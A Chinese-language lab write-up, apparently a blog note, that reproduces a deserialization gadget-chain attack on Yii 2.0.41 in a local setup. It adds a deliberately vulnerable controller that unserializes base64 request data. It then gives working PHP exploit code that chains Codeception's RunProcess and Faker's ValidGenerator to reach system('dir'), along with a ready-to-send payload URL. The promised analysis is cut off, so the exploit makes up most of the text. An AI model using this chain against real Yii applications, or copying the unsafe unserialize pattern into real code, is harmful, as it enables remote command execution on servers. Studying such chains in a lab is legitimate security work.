一环境配置
1.环境 yii-2.0.41版本
2. vscode+xdebug手动调试
3. php环境7.1
下载源码修改/config/web.php文件17行cookieValidationKey,随便设一个数目,然后,解压,到那个目录下php yii serve 启动(需要配置php环境变量)
访问
http//:localhost:8080
自己写一个反序列化入口
在controllers目录下创建一个TestController:
<?php
namespace app\controllers;
use Yii;
use yii\web\Controller;
use yii\filters\VervFilter;
use yii\filters\AccessControl;
use app\models\LoginForm;
class TestController extends \yii\web\Controller
{
public function actionSss($data){
return unserialize(base64_decode($data));
}
}
?>
二.分析链子
exp
<?php
namespace Faker{
class DefaultGenerator{
protected $default ;
function __construct($argv)
{
$this->default = $argv;
}
}
class ValidGenerator{
protected $generator;
protected $validator;
protected $maxRetries;
function __construct($command,$argv)
{
$this->generator = new DefaultGenerator($argv);
$this->validator = $command;
$this->maxRetries = 99999999;
}
}
}
namespace Codeception\Extension{
use Faker\ValidGenerator;
class RunProcess{ //第二步
private $processes = [] ;
function __construct($command,$argv)
{
$this->processes[] = new ValidGenerator($command,$argv);
}
}
}
namespace {
use Codeception\Extension\RunProcess;
$exp = new RunProcess('system','dir'); //起点
echo(base64_encode(serialize($exp)));
exit();
}
下断点
开启单步调试
访问
http://localhost:8080/index.php?r=test/sss&data=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6MzoiZGlyIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0
之后我们开始分析
参考
https://xz.aliyun.com/t/9420
https://www.bilibili.com/video/BV1eX4y1F7bt?from=search&seid=14419449796489861381